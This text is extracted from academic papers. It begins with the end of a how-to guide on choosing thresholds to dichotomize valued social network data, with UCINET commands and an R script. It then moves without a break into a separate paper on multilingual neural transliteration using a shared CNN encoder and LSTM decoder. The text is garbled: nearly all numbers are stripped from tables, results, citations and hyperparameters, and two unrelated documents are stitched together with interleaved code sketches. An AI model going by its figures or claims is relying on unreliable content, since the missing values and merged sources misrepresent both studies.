the table shows that at ≥ , the number of g- transitive triples is and the number of intransitive triples is . hence, ties or above are strong ties, and ties < but > are weak ties. combining this with our previous approach, we might summarize the situation as follows. dichoto- mizing at ≥ optimally identifies ties of any kind in terms of the least-violence criterion, and maintains a single large component (plus isolates). dichotomizing at ≥ identifies strong ties, which strongly fragment the network. the latter is useful for sharply outlining a subgroup structure, while the former enables the calculation of measure that requires connected net- works (aside from isolates) (figure ). table . z-score, correlation, number of ties and density of the dgg dataset at different dichotomization levels. value z-score correlation ties density . . . . . . . . . . . . . . . − . . . − . . . − . . table . number of g-transitive and intransitive triples in the dgg dataset at different dichotomization levels. value trans intrans , , , techniques: dichotomizing a network it is worth noting that freeman’s approach needs not be limited to maximizing g-transitivity. on theoretical grounds, we may identify a specific mechanism that organizes ties. for example, we may see a status mechanism such at the matthew effect in which nodes that already have a lot of ties tend to attract even more ties. 
now, to dichotomize valued data, we choose the cutoff that maximizes the extent to which there are just a few nodes with many ties and a great many nodes with few ties. alternatively, we might choose the cutoff to maximize the level of transitivity in the network. conclusion this “how to” guide on dichotomization is intend- ed to provide guidance on how to find a suitable threshold for dichotomization for social network data. we propose that in all cases, we should start by creating multiple versions of the dichotomized network at every possible value of the threshold and inspect them visually. then, we suggest three sepa- rate approaches in order to choose (and justify your choice of) a single threshold based on (i) maximiz- figure : dgg women by women dataset dichotomized at . strong ties in bold. figure : dgg women by women dataset dichotomized at . connections ing expected results, (ii) minimizing distortions, and (iii) identifying specific emergent properties in the network. references bernard, h., killworth, p. and sailer, l. . in- formant accuracy in social network data iv. social net- works : – . butts, c.t. . a relational event framework for social action. sociological methodology : – . davis, a., gardner, b. b. and m. r. gardner . deep south, chicago: the university of chicago press. freeman, l.c. . finding social groups: a meta-analysis of the southern women data, in breiger, r., carley, k., and pattison, p. (eds), dynamic social network modeling and analysis: workshop summary and papers committee on human factors, national research council: – , national acade- mies press. granovetter, m. . the strength of weak ties. american journal of sociology : – . techniques: dichotomizing a network figure a : screenshot of netdraw. addendum – ucinet to visualize successive dichotomizations in ucinet, one opens the valued data as usual and presses the + sign in the rels tab at right to raise the level of di- chotomization by one unit, see figure a , below. this can also be done in the command line intern- face (cli) as follows: ->d = dichot(women ge ) ->d = dichot(women ge ) ->d = dichot(women ge ) etc. addendum – r script #import the davis data set in r, assuming that it is already in a text file, for example exported from ucinet. library(readr) davis <- as.matrix(read.csv(“davis.txt”,sep = “\t”, row.names = )) #create a one-mode network by multiplying the original matrix by its transpose davisonemode <- davis %*% t(davis) diag(davisonemode) <- #dichotomize the network at all values davisonemodedic <- array(dim = c(nrow(davi- sonemode),ncol(davisonemode),max(davisone- mode))) for (i in :max(davisonemode)) { davisonemodedic[,,i] <- ifelse(davisonemode >= i, , ) } #visualize all networks library(sna) par(mfrow = c( , )) for (i in :max(davisonemode)) { plot(as.network(davisonemodedic[,,i])) } #correlation between original network and dichot- omized networks, and some descriptive statistics stats <- array(dim = c(max(davisonemode), )) colnames(stats) <- c(“threshold”, “correlation”, “num of s”, “density”) for (i in :max(davisonemode)) { stats[i, ] <- i stats[i, ] <- summary(qaptest(list(davisonemode, davisonemodedic[,,i]), gcor, g = , g = ))$test stats[i, ] <- sum(davisonemodedic[,,i]) stats[i, ] <- stats[i, ]/(nrow(davisonemode)*(n- row(davisonemode) - )) } stats connections figure a : screenshot of ucinet’s interactive dichotomization routine’s results. in addition, the network could be drawn after each step: ->draw d ->draw d etc. 
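the same statistics can be computed outside of r or ucinet. the following python sketch (with a hypothetical valued matrix) implements the least-distortion criterion of the second approach: pick the cutoff whose dichotomized matrix correlates most strongly with the original valued matrix. the correlation used is the plain pearson correlation over off-diagonal cells, which is the same point estimate reported by the gcor/qaptest call in the r script above.

```python
import numpy as np

def offdiag(m: np.ndarray) -> np.ndarray:
    """Flatten a square matrix, dropping the diagonal (self-ties)."""
    mask = ~np.eye(m.shape[0], dtype=bool)
    return m[mask]

def best_cutoff(valued: np.ndarray):
    """Return (cutoff, correlation) for the dichotomization >= cutoff whose
    binary matrix correlates most strongly with the valued matrix."""
    results = []
    for c in range(1, int(valued.max()) + 1):
        binary = offdiag((valued >= c).astype(int))
        if binary.min() == binary.max():
            continue                       # constant matrix: correlation undefined
        r = np.corrcoef(offdiag(valued), binary)[0, 1]
        results.append((c, r))
    return max(results, key=lambda t: t[1])

# hypothetical symmetric valued one-mode network with zero diagonal
rng = np.random.default_rng(0)
W = rng.integers(0, 8, size=(18, 18))
W = np.triu(W, 1) + np.triu(W, 1).T
cutoff, corr = best_cutoff(W)
print(f"least-distortion cutoff: >= {cutoff} (r = {corr:.2f})")
```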
to compute the correlation between an original data set and successive dichotomizations of it, we can use ucinet’s transform|interactively dichoto- mize procedure. figure a below shows this proce- dure applied to the dgg women data. finally, to execute freeman’s strong-weak-null tie decomposition based on g-transitivity, we can use ucinet’s command line interface (cli) as shown in table a . table a . g-transitivity decomposition command line instruction and output in ucinet. ->dsp gtrans(women) level trans intrans possible prop trans -------- -------- -------- -------- -------- . , , . , , . , , . leveraging orthographic similarity for multilingual neural transliteration anoop kunchukuttan , mitesh khapra , gurneet singh , pushpak bhattacharyya {anoopk,pb}@cse.iitb.ac.in, {miteshk,garry}@cse.iitm.ac.in department of computer science & engineering indian institute of technology bombay, mumbai, india. department of computer science & engineering indian institute of technology madras, chennai, india. abstract we address the task of joint training of translit- eration models for multiple language pairs (multilingual transliteration). this is an in- stance of multitask learning, where individ- ual tasks (language pairs) benefit from shar- ing knowledge with related tasks. we fo- cus on transliteration involving related tasks i.e., languages sharing writing systems and phonetic properties (orthographically similar languages). we propose a modified neural encoder-decoder model that maximizes pa- rameter sharing across language pairs in order to effectively leverage orthographic similar- ity. we show that multilingual transliteration significantly outperforms bilingual translitera- tion in different scenarios (average increase of % across a variety of languages we experi- mented with). we also show that multilingual transliteration models can generalize well to languages/language pairs not encountered dur- ing training and hence perform well on the ze- roshot transliteration task. we show that fur- ther improvements can be achieved by using phonetic feature input. introduction transliteration is a key building block for multi- lingual and cross-lingual nlp since it is essential for (i) handling of names in applications like ma- chine translation (mt) and cross-lingual information retrieval (clir), and (ii) user-friendly input meth- ods. the transliteration problem has been exten- sively studied in literature for a variety of language pairs (karimi et al., ). previous work has looked at the most natural setup - training on a single lan- guage pair. however, no prior work exists on jointly training multiple language pairs (referred to as mul- tilingual transliteration henceforth). multilingual transliteration can be seen as an in- stance of multi-task learning, where training each language pair constitutes a task. multi-task learning works best when the tasks are related to each other, so sharing of knowledge across tasks is beneficial. thus, multilingual transliteration can be beneficial, if the languages involved are related. we identify such a natural and practically useful scenario: mul- tilingual transliteration involving languages that are related on account of sharing writing systems and phonetic properties. we refer to such languages as orthographically similar languages. we say that two languages are orthographically similar if they have: (i) highly overlapping phoneme sets, (ii) mutually compatible orthographic systems, and (iii) similar grapheme to phoneme mappings. 
for instance, indo-aryan languages largely share the same set of phonemes. they use different in- dic scripts, but correspondences can be established between equivalent characters across scripts. for example, the hindi (devanagari script) character क (ka) maps to the bengali ক (ka) which stands for the consonant sound (ipa: k). the grapheme to phoneme mapping is also consistent for equiva- lent characters. we can identify two major sources of orthographic similarity: (a) genetic relationship between languages (groups like romance, slavic, indo-aryan and turkic languages) (b) prolonged contact between languages over a long period of time, e.g. convergence in phonological properties of the indo-aryan and dravidian languages in the in- dian subcontinent, most strikingly retroflex conso- nants (subbārāo, ). dravidian and indo-aryan languages use compatible indic scripts. another transactions of the association for computational linguistics, vol. , pp. – , . action editor: mona diab. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. example is the nigerian linguistic area comprising niger-congo languages like yoruba, fula, igbo and afro-asiatic languages like hausa (the most widely spoken language in nigeria). most languages use the latin script (some use ajani, a modified arabic script). in this work, we explore multilingual translit- eration involving orthographically similar lan- guages. to the best of our knowledge, ours is the first work to address the task of multilingual transliteration. we propose that transliteration in- volving orthographically similar languages is a sce- nario where multilingual training can be very ben- eficial. since these languages share phonological properties, the transliteration tasks are clearly re- lated. we can utilize this relatedness by sharing the vocabulary across all related languages. the grapheme-to-grapheme correspondences enable vo- cabulary sharing. it helps transfer knowledge across languages while training. for instance, if the net- work learns that the english character l maps to the hindi character ल (la), it would also learn that l maps to the corresponding kannada character ಲ (la). data from both kannada and hindi datasets will reinforce the evidence for this mapping. a sim- ilar argument can be made when both the source and target languages are related. the grapheme- grapheme correspondences arise from the underly- ing phoneme-phoneme correspondences. the con- sistent grapheme-phoneme mappings help establish the grapheme-grapheme correspondences. due to the utilization of language relatedness, the benefits that are typically ascribed to multi-task learning (caruana, ) may also apply to mul- tilingual transliteration. since related languages share characters, it is possible to share representa- tions across languages. this may help to generalize transliteration models since joint training provides an inductive bias which prefers models that are better at transliterating multiple language pairs. the train- ing may also benefit from implicit data augmenta- tion since training data from multiple language pairs is available. from the perspective of a single lan- guage pair, data from other language pairs can be seen as additional (noisy) training data. this is par- ticularly beneficial in low-resource scenarios. 
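the character-level correspondence illustrated above (क ↔ ক) can be made operational with a few lines of code, because the major indic scripts are laid out with parallel offsets in their unicode blocks; the mapping is clean for most, though not all, characters. the sketch below is not the authors' code, but it shows the kind of offset-based mapping that is later used to build the shared vocabulary:

```python
# unicode block start points for a few indic scripts (standard unicode ranges)
BLOCK_START = {
    "devanagari": 0x0900,
    "bengali":    0x0980,
    "tamil":      0x0B80,
    "kannada":    0x0C80,
}

def to_common_offsets(text: str, script: str) -> list:
    """Map each character to its offset within the script's unicode block,
    giving a script-neutral representation shared across indic languages."""
    base = BLOCK_START[script]
    return [ord(ch) - base if 0 <= ord(ch) - base < 0x80 else ord(ch)
            for ch in text]

def convert_script(text: str, src: str, tgt: str) -> str:
    """Re-render a string in another indic script by reusing the offsets."""
    shift = BLOCK_START[tgt] - BLOCK_START[src]
    return "".join(chr(ord(ch) + shift)
                   if 0 <= ord(ch) - BLOCK_START[src] < 0x80 else ch
                   for ch in text)

print(to_common_offsets("कमल", "devanagari"))            # [21, 46, 50]
print(convert_script("कमल", "devanagari", "bengali"))    # কমল
print(convert_script("कमल", "devanagari", "kannada"))    # ಕಮಲ
```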
our work adds to the increasing body of work investigating multilingual training for various nlp tasks like pos tagging (gillick et al., ), ner (yang et al., ; rudramurthy et al., ) and machine translation (dong et al., ; firat et al., ; lee et al., ; zoph et al., ; johnson et al., ) with a view to learn models that gen- eralize across languages and make effective use of scarce training data. the following are the contributions of our work: ( ) we propose a compact neural encoder-decoder model for multilingual transliteration, that is de- signed to ensure maximum sharing of parameters across languages while providing room for learning language-specific parameters. this allows greater sharing of knowledge across language pairs by lever- aging orthographic similarity. we empirically show that models with maximal parameter sharing are ben- eficial, without increasing the model size. ( ) we show that multilingual transliteration ex- hibits significant improvement in transliteration ac- curacy over bilingual transliteration in different sce- narios (average improvement of %). our results are backed by extensive experiments on languages across orthographically similar language groups. ( ) we perform an error analysis which suggests that representations learnt by the encoder in multilin- gual transliteration can reduce transliteration ambi- guities. multilingual transliteration also seems bet- ter at learning canonical transliterations instead of alternative, phonetically equivalent transliterations. these could explain the improved performance of multilingual transliteration. ( ) we explore the zeroshot transliteration task (i.e., transliteration between languages/language pairs not seen during training) and show that our multi- lingual model can generalize well to unseen lan- guages/language pairs. notably, the zeroshot transliteration results mostly outperform the direct bilingual transliteration model. ( ) we have richer phonetic information at our dis- posal for some related languages. we propose a novel method to incorporate phonetic input in the model and show that it provides modest gains for multilingual transliteration. the rest of the paper is organized as follows. sec- tion discusses related work. section formalizes the multilingual transliteration task and describes our proposed solution. sections and discuss the ex- perimental setup, results and analysis. section dis- cusses various zeroshot transliteration scenarios, our solutions and the results of experiments. section discusses incorporation of phonetic information for multilingual transliteration. section concludes the work and discusses future directions. related work general transliteration methods previous work on transliteration has focused on the scenario of bilingual training. until recently, the best- performing solutions were discriminative statistical transliteration methods based on phrase-based statis- tical machine translation (bisani and ney, ; ji- ampojamarn et al., ; jiampojamarn et al., ; finch and sumita, ). recent work has explored bilingual neural transliteration using the standard neural encoder-decoder architecture (with attention mechanism) (bahdanau et al., ) or its adap- tions (finch et al., ; finch et al., ). using target bidirectional lstm with model ensembling, finch et al. ( ) have outperformed the state-of- the-art phrase-based systems on the news shared task datasets. on the other hand, we focus on mul- tilingual transliteration with the encoder-decoder ar- chitecture or its adaptations. 
the two strands of work are obviously complimentary. multilinguality and transliteration to the best of our knowledge, ours is the first work on multi- lingual transliteration. jagarlamudi and daumé iii ( ) have proposed a method for transliteration mining (given a name and candidate transliterations, identify the correct transliteration) across multiple languages using grapheme to ipa mappings. note that their model cannot generate transliterations; it can only rank candidates. some literature mentions multilingual transliteration (surana and singh, ; he et al., ; prakash, ; pouliquen et al., ) or multilingual transliteration mining (kle- mentiev and roth, ; yoon et al., ). in these cases, however, multilingual refer to methods which work with multiple languages (as opposed to joint training - the sense of the word multilingual as we use it). multilingual translation our work on multilin- gual transliteration is motivated by recently pro- posed multilingual neural machine translation archi- tectures (firat et al., ). broadly, these proposals can be categorized into two groups. one group con- sists of architectures that specialize parts of the net- work for particular languages: specialized encoders (zoph et al., ), decoders (dong et al., ) or both (firat et al., ). the other group tries to learn more compact networks with little special- ization across languages by using a joint vocabu- lary (johnson et al., ; lee et al., ). for multilingual transliteration, we adopt an approach that is closer to the latter group since the languages under consideration use compatible scripts result- ing in a shared vocabulary. we specialize just the output layer for target languages, but share the en- coder, decoder and character embeddings across lan- guages. in this respect, we differ from johnson et al. ( ). they share all network components across languages, but add an artificial token at the begin- ning of the input sequence to indicate the target lan- guage. zeroshot transliteration we use the multilin- gual models to address zeroshot transliteration. ze- roshot transliteration using bridge/pivot language has been explored for statistical machine transliter- ation (khapra et al., ) as well as neural ma- chine transliteration (saha et al., ). unlike pre- vious approaches which pivot over bilingual translit- eration models, we propose zeroshot transliteration that pivots over multilingual transliteration mod- els. we also propose a direct zeroshot transliter- ation method, a scenario which has been explored for machine translation by johnson et al. ( ), but not investigated previously for transliteration. in our zeroshot model, sequences from multiple source languages are mapped to a common encoder rep- resentation without the need for a parallel corpus between the source languages. another work, the correlational encoder-decoder architecture (saha et al., ), maps source and pivot languages to a common space but requires a source-pivot parallel transliteration corpus. multilingual transliteration learning we first formalize the multilingual transliteration task and then describe our proposed solution. 
[figure: multilingual neural transliteration architecture. panel (a) shows the overall network: a character embedding layer, a cnn encoder, an attention network and an lstm decoder, all shared across languages, with a separate output layer per target language; the example shows the name 'tendulkar' being transliterated into two indic scripts. panel (b) shows the cnn encoder: character embeddings (example input 'ernakulam') are passed through convolutions of several filter widths (with same padding) and relu, followed by max pooling, and the concatenated outputs form the annotation vectors.]

task definition

the multilingual transliteration task involves learning transliteration models for l language pairs (s_i, t_i) ∈ L (i = 1 to l), where L ⊂ S × T, and S, T are sets of source and target languages respectively. the languages in each set are orthographically similar. S and T need not be mutually exclusive. we are provided with parallel transliteration corpora for these l language pairs (D_i, for all i = 1 to l). the goal is to learn a joint transliteration model for all language pairs which minimizes an appropriate loss function over all the transliteration corpora:

M* = argmin_M ℒ(M, D)

where M is the candidate joint transliteration model, D = (D_1, D_2, ..., D_l) is the training data for all language pairs, and ℒ is the training loss function given the model and the training data. we focus on practical training scenarios:

similar source languages: we have multiple orthographically similar source languages and a single target language which is not similar to the source languages. this is an instance of many-to-one learning, e.g., indic languages to english.

similar target languages: we have multiple orthographically similar target languages and a single source language which is not similar to the target languages. this is an instance of one-to-many learning, e.g., english to indic languages.

all similar languages: we have multiple source languages as well as target languages, which are all orthographically similar. this is an instance of many-to-many learning, e.g., indic-indic languages.

proposed solution

we propose a neural encoder-decoder model for multilingual transliteration. for each source-target language pair (s, t), the network models p_{s,t} = P(y_j^t | y_{j−1}^t ... y_1^t, x^s), where x^s is the input character sequence and y_j^t is the j-th element of the output character sequence y^t. note that we design a single network to represent all the p_{s,t} distributions corresponding to the set of language pairs L. our network is an adaptation of the standard encoder-decoder model with attention (bahdanau et al., ). we describe only the salient aspects of our network and refer the reader to bahdanau et al. ( ) for the basic encoder-decoder architecture. figure (a) shows the network architecture of our multilingual transliteration system.

encoder & decoder: we used a cnn encoder to encode the character sequence. it consists of a single convolutional layer (with same padding), followed by relu units and max pooling. we use filters of different widths and concatenate their outputs to produce the encoder output. figure (b) shows a schematic of the encoder. we chose a cnn over the conventional bidirectional lstm layer since the temporal dependencies for transliteration are mostly local, and these can be handled by the cnn encoder. we observed that training and decoding are significantly faster, with little impact on accuracy.
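the cnn character encoder described above is straightforward to realize. the following pytorch sketch is only illustrative: the filter widths, embedding size, number of filters and pooling configuration are placeholders rather than the paper's exact settings.

```python
import torch
import torch.nn as nn

class CharCNNEncoder(nn.Module):
    """Multi-width CNN character encoder: embeddings -> parallel 1-D
    convolutions (same padding) -> ReLU -> max pooling, with per-width
    outputs concatenated into one annotation vector per character."""

    def __init__(self, vocab_size: int, emb_dim: int = 64,
                 filters_per_width: int = 128, widths=(1, 2, 3, 4)):
        super().__init__()
        self.embed = nn.Embedding(vocab_size, emb_dim, padding_idx=0)
        self.convs = nn.ModuleList([
            nn.Conv1d(emb_dim, filters_per_width, kernel_size=w, padding=w // 2)
            for w in widths
        ])
        self.pool = nn.MaxPool1d(kernel_size=2, stride=1, padding=1)

    def forward(self, char_ids: torch.Tensor) -> torch.Tensor:
        # char_ids: (batch, seq_len) integer character indices
        seq_len = char_ids.size(1)
        x = self.embed(char_ids).transpose(1, 2)        # (batch, emb, seq_len)
        outs = []
        for conv in self.convs:
            h = torch.relu(conv(x))                     # (batch, filters, ~seq_len)
            h = self.pool(h)
            outs.append(h[:, :, :seq_len])              # trim padding overhang
        return torch.cat(outs, dim=1).transpose(1, 2)   # (batch, seq_len, 4*filters)

enc = CharCNNEncoder(vocab_size=120)
ids = torch.randint(1, 120, (8, 15))     # a batch of 8 names, 15 characters each
print(enc(ids).shape)                    # torch.Size([8, 15, 512])
```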
the decoder contains a layer of lstm cells and their start state is the average of the encoder’s output vectors (sennrich et al., ). parameter sharing: the vocabulary of the ortho- graphically similar languages (at input and/or out- put) is comprised of the union of character sets of all these languages. since the character set of these lan- guages overlaps to a large extent, we share their char- acter embeddings too. the encoder is shared across all source languages and the decoder is shared across all target languages. the network uses a shared attention mechanism. the attention network is comprised of a single feed- forward layer, which predicts the attention score given the previous decoder output, previous decoder state and encoder annotation vector. the output layer (a fully connected feedforward layer) transforms the decoder lstm layer’s output to the size of the output vocabulary, and a softmax function is applied to convert the output scores to probabilities. each target language has its own set of output layer parameters. barring the output layer, all network parame- ters (input embeddings, output embeddings, at- tention layer, encoder and decoder) are shared across all similar languages. this allows maxi- mum transfer of information for multilingual learn- ing, while the output layer alone specializes for the specific target language. compared to using a target language tag in the input sequence (johnson et al., ), we believe our approach allows the language- specific parameters to directly influence the output characters. training objective and model selection: we minimize the average negative likelihood of paral- lel training corpora across all language pairs. we determined the hyperparameters which gave best re- sults on a validation set. after training the model for a fixed number of iterations (sufficient for conver- gence), we select the model with the maximum ac- curacy on the validation set for each language pair. for instance, if the model corresponding to the nd epoch reported maximum accuracy on the validation set for english-hindi, this model was used for report- ing test set results for english-hindi. we observed that this criterion performed better than choosing the model with least validation set loss over all language pairs. experimental setup we describe our experimental setup. network details: the cnn encoder has filters (widths to ) of hidden units each in the con- volutional layer (encoder output size= ). we use a stride size of and the same padding for the convolutional and max-pooling layers. the decoder is a single layer of lstm units. we used the same configuration for both bilingual and multilin- gual experiments across all datasets for convenience after exploration on some language pairs. we apply dropout (srivastava et al., ) (probability= . ) at the output of the encoder and decoder, and sgd with the adam optimizer (kingma and ba, ) (learn- ing rate= . ). we trained our models for a max- imum of epochs (which we found sufficient for our models to converge) and a batch size of . in each training epoch, we cycle through the parallel corpora of each language pair. the parallel corpora are roughly of the same size. better training sched- ules could be explored in future. languages: we experimented with two sets of or- thographically similar languages: indian languages: (i) hindi (hi), bengali (bn) from the indo-aryan branch of indo-european fam- ily (ii) kannada (kn), tamil (ta) from the dravid- ian family. 
we studied indic-indic transliteration and transliteration involving a non-indian language (english↔indic). we mapped equivalent characters in different indic scripts in order to build a common vocabulary based on the common offsets of the uni- code codepoints (kunchukuttan et al., ). slavic languages: czech (cs), polish (pl), slovenian (sl) and slovak (sk). we studied arabic↔slavic transliteration. arabic is a non-slavic language (semitic branch of afro-asiatic) and uses an abjad script in which vowel diacritics are omitted in gen- eral usage. the languages chosen are representative of lan- guages spoken by some major groups of peoples en-indic indic-en indic-indic ar-slavic en-hi k hi-en k bn kn ta ar-cs k en-bn k bn-en k hi ar-pl k en-kn k kn-en k bn ar-sl k en-ta k ta-en k kn ar-sk k table : training set statistics for different datasets (number of word pairs). validation set: k (en→indic & ar↔slavic), (indic→en, indic-indic). test set: k (all pairs). pair src tgt en-hi kanaklata कनकलता (kanakalata) en-kn lehmann ಹಮ (l.ehaman) (a) english-indic pair src tgt pl-ar dumitrescu دومیرتسكو (dwmytrskw) cs-ar maurice موریس (mwrys) (b) slavic-arabic table : examples of transliteration pairs from our datasets which exhibit orthographic similarity: indic, ro- mance, germanic, slavic, etc. these languages are spoken by around billion people. so our approach addresses a major chunk of the world’s people. datasets: (see table for statistics of datasets). we used the official news shared task dataset (banchs et al., ) for english to indic transliteration. this dataset has been used for many editions of the news shared tasks. we split the news training dataset as the train and valida- tion data for indic-english transliteration. for test- ing, we used the news dev-test set. we cre- ated the indian-indian parallel transliteration corpora from the english to indian language training corpora of the news dataset by mining name pairs which have english names in common. we mined the arabic-slavic dataset from wiki- data (vrandečić and krötzsch, ), a structured knowledge base containing items (roughly entities of interest). each item has a label (title of item page) which is available in multiple languages. we ex- tracted labels from selected items referring to named entities (persons, organizations and locations) to en- sure that we extract parallel transliterations (as op- posed to translations). pair p b m pair p b m similar source and target languages indic-indic ( . %) bn-hi . . . kn-bn . . . bn-kn . . . kn-ta . . . hi-bn . . . ta-hi . . . hi-ta . . . ta-kn . . . similar source languages slavic-arabic ( . %) indic-english ( . %) cs-ar . . . bn-en . . . pl-ar . . . hi-en . . . sk-ar . . . kn-en . . . sl-ar . . . ta-en . . . similar target languages arabic-slavic ( . %) english-indic ( . %) ar-cs . . . en-bn . . . ar-pl . . . en-hi . . . ar-sk . . . en-kn . . . ar-sl . . . en-ta . . . table : comparison of bilingual (b) and multilin- gual (m) neural models as well as bilingual pbsmt (p) models (top- accuracy %). figure in brackets for each dataset shows average increase in translit- eration accuracy for multilingual neural model over bilingual neural model. best accuracies for each lan- guage pair in bold. evaluation: we use top- exact match accuracy as the evaluation metric (banchs et al., ). this is one of the metrics in the news shared tasks on transliteration. results and discussion we discuss and analyze the results of our experi- ments. . 
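as a reference point for the result tables that follow, the evaluation metric itself is simple: a word is counted as correct if the system's top-ranked candidate exactly matches any of its reference transliterations. a minimal sketch with made-up predictions and references:

```python
def top1_exact_match(predictions, references) -> float:
    """predictions: per source word, a list of candidates (best first).
    references: per source word, a set of acceptable transliterations.
    Returns the fraction of words whose top candidate matches a reference."""
    assert len(predictions) == len(references)
    hits = sum(1 for cands, refs in zip(predictions, references)
               if cands and cands[0] in refs)
    return hits / len(references)

preds = [["maurice", "moris"], ["virgil"], ["kailin"]]
refs  = [{"maurice"}, {"vergil", "virgil"}, {"kelen"}]
print(f"top-1 accuracy: {top1_exact_match(preds, refs):.2f}")   # 0.67
```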
quantitative observations table compares results of bilingual (b) and mul- tilingual (m) neural models as well as a bilingual transliteration system (p) based on phrase-based sta- tistical machine transliteration (pbsmt). the pb- smt system was trained using moses (koehn et al., ) with no lexicalized reordering and uses mono- tonic decoding. we used a -gram character lan- guage model trained with witten-bell smoothing. we observe that multilingual training substan- tially improves the accuracy over bilingual training in all datasets (an average increase of . % over all language pairs). transliteration accuracy increases in all scenarios: (i) similar sources (ii) similar tar- gets and (iii) similar sources & targets. if we look at results for various language groups, transliteration involving slavic languages and ara- bic benefits more than transliteration involving in- dic languages and english. arabic→slavic translit- eration shows maximum improvement (average: . %) while english→indic pairs show minimum improvement (average: . % ). we also see that the multilingual model shows significant improvements over a bilingual translit- eration system based on phrase-based smt. the pbsmt system is better than the bilingual neural transliteration system in most cases. this is consis- tent with previous work (finch et al., ), where the standard encoder-decoder architecture (with at- tention mechanism) (bahdanau et al., ) could not outperform pbsmt approaches. however, a model using target bidirectional lstm with model ensembling (finch et al., ) outperforms pbsmt models. these improvements are orthogonal to our work and could be used to further improve the bilin- gual as well as multilingual systems. the bilingual neural network models are not able to outperform the pbsmt models possibly due to the small size of the datasets and the limited depth of the network (single layer encoder and decoder). . qualitative observations we see that multilingual transliteration is better than bilingual transliteration in the following aspects: • vowels are generally a major source of translit- eration errors (kumaran et al., ; kunchukut- tan and bhattacharyya, ) because of ambigui- ties in vowel mappings. we see a major decrease in vowel errors due to multilingual training (aver- age decrease of ∼ %). we observe substantial de- crease in long-short vowel confusion errors (indic languages as target languages) and insertion/deletion of a (english/slavic as target). we also see a ma- jor improvement in arabic→slavic transliteration. the arabic script does not represent vowels, hence the transliteration system needs to correctly generate vowels. the multilingual model is better at generat- ing vowels compared to the bilingual model. • we also observe that consonants with similar pho- netic properties are a major source of transliteration source b m باستور (bastwr) bastor pastor كیلني (kylyn) kelen kailin (a) arabic-czech examples source b m व जर्ल (varjila) vergill virgil ए लसन (elisana) elissan ellison (b) hindi-english examples table : examples of bi- vs. multi-lingual outputs. ar and hi text are also shown using buckwalter and itrans romanization schemes respectively errors, and these show a substantial decrease with multilingual training. for indic-english translitera- tion, we see substantial error reduction in the follow- ing character pairs k-c, t-d, p-b. we also observe a decrease in confusion between aspirated and unaspi- rated sounds. 
for arabic→slavic transliteration, we see substantial error reduction for the following char- acter pairs k-c, f-v and p-b. • for slavic→arabic, we observed a significant re- duction in the number of errors related to characters representing fricative sounds like j,s,z,g (buckwalter romanization). • the multilingual system seems to prefer the canon- ical spellings, even when other alternative spellings seem faithful to the source language phonetics. the system is thus able to learn conventional usage better than the bilingual models. e.g. morisa (hindi, ro- manized text shown) is transliterated incorrectly to the phonetically acceptable english word moris by the bilingual model. the multilingual model gener- ates the correct system maurice. • since indic scripts are very phonetic, very few non-canonical spellings are possible. as a conse- quence, vowel error reduction was also minimum for english-indic transliteration ( %). this may partly explain why multilingual training provides minimal benefit for english-indic transliteration. table shows some examples where multilingual output is better than the bilingual output. figure : visualization of contextual representations of vowels for hi-en transliteration. each colour rep- resents a different vowel. . analysis we investigated a few hypotheses to understand why multilingual models are better: better contextual representations for vowels: we hypothesize that the encoder learns better contex- tual representations for vowels. to test this hypoth- esis, we studied character long sequences from the test set with a vowel in the middle (i.e., -char win- dow around vowel). we processed these sequences through the encoder of the bilingual and multilin- gual transliteration systems to generate the encoder output corresponding to the vowels. for instance, for the vowel a in the word part, we encode the character sequence par using the encoder. the en- coder output corresponding to the character a is con- sidered the contextual representation of the charac- ter a in this word. figure shows a visualization of these contextual representations of the vowels using t-sne (van der maaten and hinton, ). for the bilingual model, we observe that the contextual rep- resentations of same vowels tend to cluster together. for the multilingual model, the clustering is more specialized. the representations are grouped by the vowel along with the context. for instance, the re- gion highlighted in the plot shows representations of hindi vowels e (yellow) and i (blue) followed by the consonant v. other vowels with the same context are seen in the same region too. this suggests that the multilingual model is able to learn specialized rep- resentations of vowels in different contexts and this helps the decoder generate correct transliterations. more monolingual data: in the many-one scenario, more monolingual data is available for the target lan- guage since target words from all training language pairs are available. we hypothesize that this may help the decoder to better model the target language sequence. to test this, we decoded the test data using the bilingual models along with a larger target rnn lm (with lstm units) using shallow fusion (gul- cehre et al., ). the rnn lm was trained on all the target language words across all parallel cor- pora. these experiments were performed for indic- english and slavic-arabic pairs. we did not observe any major change in the transliteration accuracies of bilingual models due to integration of a larger lm. 
thus, larger target side data does not explain the im- provement in transliteration accuracy due to multi- lingual transliteration. more parallel data: multilingual training pools to- gether parallel corpora from multiple orthographi- cally similar languages, which effectively increases the data available for training. to test if this ex- plains the improved performance, we compared mul- tilingual and bilingual models under similar data size conditions, i.e., the total parallel corpora size across all language pairs used to train the multilin- gual model is equivalent to the size of the bilingual corpus used to train the bilingual model. specifically we compared the following under similar data size conditions: (a) {bn,hi,kn,ta}-en multilingual model ( %hi-en training pairs) withhi-enbilingual model (b) {cs,pl,sk,sl}-ar multilingual model ( % pl-ar training pairs) with pl-ar bilingual model. table shows the results of these experiments. we ob- served that the multilingual system showed signif- icantly higher transliteration accuracy compared to the bilingual model for polish-arabic. for hindi- english, the bilingual model was better than the mul- tilingual model. so, we cannot decisively conclude that the performance improvement of multilingual transliteration can be attributed to the effective in- crease in training data size. in a multilingual train- ing scenario, data from other languages act as noisy pair b m pl-ar . . hi-en . . table : results of experiments under balanced data conditions pair sepdec sepout sepnone pair sepdec sepout sepnone indic-indic bn-hi . . . kn-bn . . . bn-kn . . . kn-ta . . . hi-bn . . . ta-hi . . . hi-ta . . . ta-kn . . . arabic-slavic english-indic ar-cs . . . en-bn . . . ar-pl . . . en-hi . . . ar-sk . . . en-kn . . . ar-sl . . . en-ta . . . table : comparison of multilingual architectures version of data from the original language and sup- plement the available bilingual data, but they can- not necessarily substitute data from the original lan- guage pair. . comparison with variant architectures we compare three variants of the encoder-decoder architecture: (a) our model: target language specific output layer (and parameters) (sepout), (b) every tar- get language has its own decoder and output layer (sepdec) (lee et al., ), and (c) all languages share the same decoder and output layer, but the first to- ken of the input sequence is a special token to spec- ify target language (sepnone) (johnson et al., ). these architectures differ in the degree of parameter sharing. sepdec has fewer shared parameters than our model and sepnone has more shared parameters than our model. in all three cases, the encoder is shared across all source languages. table shows the re- sults of this comparison. we cannot definitively con- clude if one model is better than the other. except for arabic-slavic transliteration, the trend seems to indicate that models with greater parameter sharing (sepout/sepnone) may perform better. in any case, given the comparable results we prefer models with fewer model parameters (sepout/sepnone). zeroshot transliteration in the previous sections, we have shown that multi- lingual training is beneficial for language pairs ob- served during training. in addition, the encoder- decoder architecture opens up the possibility of ze- roshot 